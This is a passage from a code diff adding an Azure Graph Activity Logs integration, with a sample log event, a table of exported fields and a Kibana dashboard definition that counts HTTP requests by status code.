"{\"Level\":4,\"callerIpAddress\":\"81.2.69.143\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"durationMs\":1100725,\"location\":\"France Central\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e32-269a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe58790-a848-4a93-9d2c-5645972aejk9\",\"durationMs\":1100725,\"identityProvider\":\"https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/\",\"ipAddress\":\"81.2.69.143\",\"location\":\"France Central\",\"operationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/directoryRoles\",\"responseSizeBytes\":4300,\"responseStatusCode\":200,\"roles\":\"Application.Read.All Domain.Read.All GroupMember.Read.All LicenseAssignment.ReadWrite.All Organization.Read.All Policy.Read.ConditionalAccess RoleManagement.Read.Directory Team.ReadBasic.All TeamsTab.Create TeamsTab.Read.All TeamsTab.ReadWrite.All User.Read.All\",\"scopes\":null,\"servicePrincipalId\":\"f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg\",\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"timeGenerated\":\"2024-03-07T10:24:44.7939418Z\",\"tokenIssuedAt\":\"2024-03-07T10:19:44Z\",\"userAgent\":\"\",\"userId\":null,\"wids\":\"a207b4d3-0g8d-90cb-bhj5-d80n3121e69\"},\"resourceId\":\"/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"time\":\"2024-03-07T10:24:44.7939418Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 4300, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.143" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/directoryRoles", + "original": "https://graph.microsoft.com/v1.0/directoryRoles", + "path": "/v1.0/directoryRoles", + "scheme": "https" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| azure.correlation_id | Correlation ID. | keyword | +| azure.graphactivitylogs.category | Azure Event Category. For example, Graph Activity Logs has value `MicrosoftGraphActivityLogs`. | keyword | +| azure.graphactivitylogs.operation_name | Operation name. | keyword | +| azure.graphactivitylogs.operation_version | The Graph API version of the event. | keyword | +| azure.graphactivitylogs.properties.api_version | The API version of the event. | keyword | +| azure.graphactivitylogs.properties.app_id | The identifier for the application. | keyword | +| azure.graphactivitylogs.properties.at_content | Reserved for future use. | keyword | +| azure.graphactivitylogs.properties.billed_size | The record size in bytes. | double | +| azure.graphactivitylogs.properties.client_auth_method | Indicates how the client was authenticated. For a public client, the value is 0. If client ID and client secret are used, the value is 1. If a client certificate was used for authentication, the value is 2. | integer | +| azure.graphactivitylogs.properties.client_request_id | The client request identifier when sent. If no client request identifier is sent, the value will be equal to the operation identifier. | keyword | +| azure.graphactivitylogs.properties.identity_provider | The identity provider that authenticated the subject of the token. | keyword | +| azure.graphactivitylogs.properties.is_billable | Specifies whether ingesting the data is billable. When _IsBillable is false ingestion isn't billed to your Azure account. | boolean | +| azure.graphactivitylogs.properties.operation_id | The identifier for the batch. For non-batched requests, this will be unique per request. For batched requests, this will be the same for all requests in the batch. | keyword | +| azure.graphactivitylogs.properties.request_uri | The URI of the request. | keyword | +| azure.graphactivitylogs.properties.roles | The roles in token claims. | keyword | +| azure.graphactivitylogs.properties.scopes | The scopes in token claims. | keyword | +| azure.graphactivitylogs.properties.service_principal_id | The identifier of the servicePrincipal making the request. | keyword | +| azure.graphactivitylogs.properties.sign_in_activity_id | The identifier representing the sign-in activitys. | keyword | +| azure.graphactivitylogs.properties.source_system | The type of agent the event was collected by. For example, OpsManager for Windows agent, either direct connect or Operations Manager, Linux for all Linux agents, or Azure for Azure Diagnostics. | keyword | +| azure.graphactivitylogs.properties.time_generated | The date and time the request was received. | date | +| azure.graphactivitylogs.properties.token_issued_at | The timestamp the token was issued at. | date | +| azure.graphactivitylogs.properties.type | The name of the table. | keyword | +| azure.graphactivitylogs.properties.user_agent | The user agent information related to request. | keyword | +| azure.graphactivitylogs.properties.wids | Denotes the tenant-wide roles assigned to this user. | keyword | +| azure.graphactivitylogs.result_signature | Result signature. | keyword | +| azure.resource.authorization_rule | Authorization rule. | keyword | +| azure.resource.group | Resource group. | keyword | +| azure.resource.id | Resource ID. | keyword | +| azure.resource.name | Name. | keyword | +| azure.resource.namespace | Resource type/namespace. | keyword | +| azure.resource.provider | Resource type/namespace. | keyword | +| azure.subscription_id | Azure subscription ID. | keyword | +| azure.tenant_id | tenant ID. | keyword | +| client.geo.city_name | City name. | keyword | +| client.geo.continent_name | Name of the continent. | keyword | +| client.geo.country_iso_code | Country ISO code. | keyword | +| client.geo.country_name | Country name. | keyword | +| client.geo.location.lat | Longitude and latitude. | geo_point | +| client.geo.location.lon | Longitude and latitude. | geo_point | +| client.geo.region_iso_code | Region ISO code. | keyword | +| client.geo.region_name | Region name. | keyword | +| client.ip | IP address of the client (IPv4 or IPv6). | ip | +| client.user.id | Unique identifier of the user. | keyword | +| cloud.account.id | The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier. | keyword | +| cloud.availability_zone | Availability zone in which this host, resource, or service is located. | keyword | +| cloud.image.id | Image ID for the cloud instance. | keyword | +| cloud.instance.id | Instance ID of the host machine. | keyword | +| cloud.instance.name | Instance name of the host machine. | keyword | +| cloud.machine.type | Machine type of the host machine. | keyword | +| cloud.project.id | The cloud project identifier. Examples: Google Cloud Project id, Azure Project id. | keyword | +| cloud.provider | Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. | keyword | +| cloud.region | Region in which this host, resource, or service is located. | keyword | +| cloud.service.name | The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. Examples: app engine, app service, cloud run, fargate, lambda. | keyword | +| container.id | Unique container id. | keyword | +| container.image.name | Name of the image the container was built on. | keyword | +| container.labels | Image labels. | object | +| container.name | Container name. | keyword | +| data_stream.dataset | Data stream dataset name. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.geo.region_name | Region name. | keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | event.created contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from @timestamp in that @timestamp typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, @timestamp should be used. | date | +| event.dataset | Event dataset | constant_keyword | +| event.duration | Duration of the event in nanoseconds. If event.start and event.end are known this value should be the difference between the end and start time. | long | +| event.id | Unique ID to describe the event. | keyword | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data coming in at a regular interval or not. | keyword | +| event.module | Event module | constant_keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.mac | Host MAC addresses. The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | match_only_text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| http.request.id | A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. | keyword | +| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword | +| http.response.bytes | Total size in bytes of the response (body and headers). | long | +| http.response.status_code | HTTP response status code. | long | +| log.level | Original log level of the log event. If the source of the event provides a log level or textual severity, this is the one that goes in `log.level`. If your source doesn't specify one, you may put your event transport's severity here (e.g. Syslog severity). Some examples are `warn`, `err`, `i`, `informational`. | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.geo.city_name | City name. | keyword | +| source.geo.continent_name | Name of the continent. | keyword | +| source.geo.country_iso_code | Country ISO code. | keyword | +| source.geo.country_name | Country name. | keyword | +| source.geo.location.lat | Longitude and latitude. | geo_point | +| source.geo.location.lon | Longitude and latitude. | geo_point | +| source.geo.region_iso_code | Region ISO code. | keyword | +| source.geo.region_name | Region name. | keyword | +| source.ip | IP address of the source (IPv4 or IPv6). | ip | +| tags | List of keywords used to tag each event. | keyword | +| url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| url.extension | The field contains the file extension from the original request url, excluding the leading dot. The file extension is only set if it exists, as not every url has a file extension. The leading period must not be included. For example, the value must be "png", not ".png". Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| url.full | If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. | wildcard | +| url.full.text | Multi-field of `url.full`. | match_only_text | +| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| url.original.text | Multi-field of `url.original`. | match_only_text | +| url.password | Password of the request. | keyword | +| url.path | Path of the request, such as "/search". | wildcard | +| url.port | Port of the request, such as 443. | long | +| url.query | The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. | keyword | +| url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| url.username | Username of the request. | keyword | +| user.id | Unique identifier of the user. | keyword | +| user_agent.device.name | Name of the device. | keyword | +| user_agent.name | Name of the user agent. | keyword | +| user_agent.original | Unparsed user_agent string. | keyword | +| user_agent.original.text | Multi-field of `user_agent.original`. | match_only_text | +| user_agent.os.full | Operating system name, including the version or code name. | keyword | +| user_agent.os.full.text | Multi-field of `user_agent.os.full`. | match_only_text | +| user_agent.os.name | Operating system name, without the version. | keyword | +| user_agent.os.name.text | Multi-field of `user_agent.os.name`. | match_only_text | +| user_agent.os.version | Operating system version as a raw string. | keyword | +| user_agent.version | Version of the user agent. | keyword | + diff --git a/packages/azure/img/graph_activity.png b/packages/azure/img/graph_activity.png new file mode 100644 index 00000000000..887a43347a5 Binary files /dev/null and b/packages/azure/img/graph_activity.png differ diff --git a/packages/azure/img/graph_activity_logs.png b/packages/azure/img/graph_activity_logs.png new file mode 100644 index 00000000000..3e5b0c7eea4 Binary files /dev/null and b/packages/azure/img/graph_activity_logs.png differ diff --git a/packages/azure/kibana/dashboard/azure-2b2e94c8-aff5-401d-b9a5-aae2d051a92c.json b/packages/azure/kibana/dashboard/azure-2b2e94c8-aff5-401d-b9a5-aae2d051a92c.json new file mode 100644 index 00000000000..5e135497757 --- /dev/null +++ b/packages/azure/kibana/dashboard/azure-2b2e94c8-aff5-401d-b9a5-aae2d051a92c.json @@ -0,0 +1,1638 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"d1ebc51c-cb49-49f6-840a-2da6d8a6be5b\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d1ebc51c-cb49-49f6-840a-2da6d8a6be5b\",\"fieldName\":\"azure.tenant_id\",\"title\":\"Azure Tenant ID\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"d8d6db3e-83cb-40af-8f04-34f83ee80c6e\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"d8d6db3e-83cb-40af-8f04-34f83ee80c6e\",\"fieldName\":\"cloud.region\",\"title\":\"Azure Cloud Region\",\"grow\":true,\"width\":\"medium\",\"exclude\":false,\"enhancements\":{}}},\"411c7a87-3506-4e60-949e-4d3694f18141\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"411c7a87-3506-4e60-949e-4d3694f18141\",\"fieldName\":\"http.request.method\",\"title\":\"HTTP Request Method\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"ba723455-7325-4205-95f4-6e52fa4e6e46\":{\"type\":\"rangeSliderControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ba723455-7325-4205-95f4-6e52fa4e6e46\",\"fieldName\":\"http.response.status_code\",\"title\":\"HTTP Status Code\",\"grow\":true,\"width\":\"medium\",\"value\":[\"100\",\"599\"],\"enhancements\":{}}}}" + }, + "description": "Provide an overview and statistics of the audit trail of all HTTP requests that the Microsoft Graph service received and processed.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "azure.graphactivitylogs" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "azure.graphactivitylogs" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "**Navigation**\n\n[Integrations Page](/app/integrations/detail/azure/overview?integration=graphactivitylogs) \n\n**Overview**\n\nThis dashboard provides an overall view of Microsoft Graph Activity Logs. It provides insights into total requests made by applications and API clients in your tenant, while also breaking down the activity by Cloud Region, Users, and HTTP Methods.", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 12, + "i": "f3f94a78-c1cd-479d-bce4-80086ce16207", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "f3f94a78-c1cd-479d-bce4-80086ce16207", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total HTTP Requests", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#6092C0", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "0d7a9e98-05e4-48cc-b602-fbf6441fb5eb", + "w": 10, + "x": 12, + "y": 0 + }, + "panelIndex": "0d7a9e98-05e4-48cc-b602-fbf6441fb5eb", + "title": "Total HTTP Requests", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Responses 1xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "627dbdde-7bd2-4113-9422-d50e58c2efdd", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "100", + "lt": "199" + }, + "type": "range", + "value": { + "gte": "100", + "lt": "199" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "100", + "lt": "199" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#6092C0", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "2d47eead-9f8b-4540-8e61-45290eda210a", + "w": 8, + "x": 22, + "y": 0 + }, + "panelIndex": "2d47eead-9f8b-4540-8e61-45290eda210a", + "title": "HTTP Responses 1xx", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f873ce81-d2b9-4d27-951b-ea42fe7b6629", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Response 2xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "f873ce81-d2b9-4d27-951b-ea42fe7b6629", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "200", + "lt": "299" + }, + "type": "range", + "value": { + "gte": "200", + "lt": "299" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "200", + "lt": "299" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#54B399", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "e0d5b2a4-14b1-4652-81f5-8989c48cb427", + "w": 18, + "x": 30, + "y": 0 + }, + "panelIndex": "e0d5b2a4-14b1-4652-81f5-8989c48cb427", + "title": "HTTP Response 2xx", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "64260958-62e3-45e9-accd-9a2f49bc86a2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Response 3xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "64260958-62e3-45e9-accd-9a2f49bc86a2", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "300", + "lt": "399" + }, + "type": "range", + "value": { + "gte": "300", + "lt": "399" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "300", + "lt": "399" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#6092C0", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "faac9860-e512-4adf-a34a-0a89690fef99", + "w": 8, + "x": 22, + "y": 6 + }, + "panelIndex": "faac9860-e512-4adf-a34a-0a89690fef99", + "title": "HTTP Response 3xx", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7cde628c-4f1d-44e1-8a34-169e4bb5e0b7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Response 4xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "7cde628c-4f1d-44e1-8a34-169e4bb5e0b7", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "400", + "lt": "499" + }, + "type": "range", + "value": { + "gte": "400", + "lt": "499" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "400", + "lt": "499" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#E7664C", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 6, + "i": "f81b2567-5721-4dca-9ebf-243a69b06fe2", + "w": 10, + "x": 30, + "y": 6 + }, + "panelIndex": "f81b2567-5721-4dca-9ebf-243a69b06fe2", + "title": "HTTP Response 4xx", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-13f1a07a-9635-4918-816a-6aa9e9cf4510", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3027aa07-12ed-48a1-a760-745ed4a9ea26", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "13f1a07a-9635-4918-816a-6aa9e9cf4510": { + "columnOrder": [ + "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + ], + "columns": { + "9a97a672-989d-43d6-8c37-f3f0bb26fa95": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "HTTP Response 5xx", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "http.response.status_code", + "index": "3027aa07-12ed-48a1-a760-745ed4a9ea26", + "key": "http.response.status_code", + "negate": false, + "params": { + "gte": "500", + "lt": "599" + }, + "type": "range", + "value": { + "gte": "500", + "lt": "599" + } + }, + "query": { + "range": { + "http.response.status_code": { + "gte": "500", + "lt": "599" + } + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.graphactivitylogs\" " + }, + "visualization": { + "color": "#E7664C", + "layerId": "13f1a07a-9635-4918-816a-6aa9e9cf4510", + "layerType": "data", + "metricAccessor": "9a97a672-989d-43d6-8c37-f3f0bb26fa95" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + 